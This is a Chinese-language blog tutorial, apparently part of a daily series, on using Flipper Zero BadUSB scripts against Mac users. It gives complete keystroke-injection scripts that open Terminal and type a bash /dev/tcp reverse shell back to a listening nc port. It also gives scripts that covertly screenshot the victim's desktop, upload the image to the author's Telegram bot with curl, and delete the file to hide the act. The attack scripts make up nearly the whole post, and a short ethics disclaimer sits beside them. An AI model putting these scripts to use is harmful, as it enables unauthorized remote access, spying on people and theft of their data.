Day18 - 神隱少年：悄無聲息的透過 BadUSB 遠端截圖至你的 TG BOT！

前言

今天要來跟大家介紹一些有趣的 BadUSB 應用，我們會嘗試從受害者的電腦取得 revereshell，以及我們今天還會嘗試從受害者的電腦截圖傳給我們的 tg bot 然後刪除截圖假裝什麼都沒發生，趕緊來看看。

資安倫理宣導

請注意，透過 Flipper Zero 學習的資訊技術與知識，目的在於提升個人的技術能力和資安意識。我們強烈呼籲大家，絕對不要使用所學知識從事任何違法行為。您的合法使用是我們的期望，也是您自身責任的一部分。

Reverse Shell

首先我們要先在駭客的電腦上監聽某個 port，如下：

└─$ nc -lvnp 8787
listening on [any] 8787 ...

然後我們撰寫一個 Flipper BadUSB 的腳本如下：

REM Initial delay to allow the OS to recognize the device
DELAY 500

REM Use Spotlight to open Terminal
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 1000

REM Open bash
STRING bash
DELAY 500
ENTER

REM Type the reverse shell command
STRING bash -i >& /dev/tcp/[IP]/[Port] 0>&1
ENTER

我們的腳本是針對 mac 的用戶，我們透過 Spotlight 先打開 terminal 然後進到 bash，之後輸入 bash -i >& /dev/tcp/[IP]/[Port] 0>&1，就會看到駭客的監聽畫面有變化了，如下：

成功！

TelegramBot

接著我們來嘗試搭配 TG Bot 傳一些受害者的資料到我們的機器人，例如截圖他的螢幕看看他在幹嘛之類的。
首先我們去 Telegram 搜尋 @BotFather 接著輸入 /newbot 創建一個新的機器人，然後取好名字跟 username，然後 /token 產生一個 token，然後我們到瀏覽器搜尋 https://api.telegram.org/bot<YourBOTToken>/getUpdates 就可以看到 bot 收到的 json 原始數據，這時我們可以去私訊我們的機器人測試一下順便紀錄下這個私訊的 id，然後我們先測試一下我們能不能執行一個腳本從受害者的電腦傳訊息到我們的機器人，腳本如下(大家記得改成自己的)：

REM Open Spotlight and type Terminal
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 1000

REM Type the command to send message to Telegram bot
STRING curl -s -X POST https://api.telegram.org/bot<YourBOTToken>/sendMessage -d chat_id=<chat_id> -d text="Hello from BadUSB"
ENTER
DELAY 500
STRING exit
ENTER

成功！
接著我們嘗試從受害者的電腦截圖後傳給我們的機器人然後刪除我們的截圖假裝什麼都沒發生，腳本如下，記得換成你們的 token 跟 id：

REM Open Spotlight and type Terminal
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 1000

REM Get the username and take a screenshot
STRING username=$(whoami) && screencapture /Users/$username/Desktop/screenshot.png
ENTER
DELAY 1000

REM Send the screenshot to the Telegram bot
STRING curl -s -X POST -F "chat_id=<chat_id>" -F "photo=@\"/Users/$username/Desktop/screenshot.png\"" https://api.telegram.org/bot<token>/sendPhoto
ENTER
DELAY 1000

REM Clean up by removing the screenshot and closing Terminal
STRING rm /Users/$username/Desktop/screenshot.png
ENTER
DELAY 500
STRING exit
ENTER

成功！！！

按讚訂閱收藏小鈴噹叮叮叮

今天的內容也是我剛剛花一個半小時邊嘗試邊撰寫的結果，還好有順利成功，歡迎大家跟我分享有什麼有趣的 BadUSB 應用，我們可以一起來玩玩，但呼籲各位是透過 Flipper 來學習，不要真的去做壞駭客。
各位明天見，敬請期待！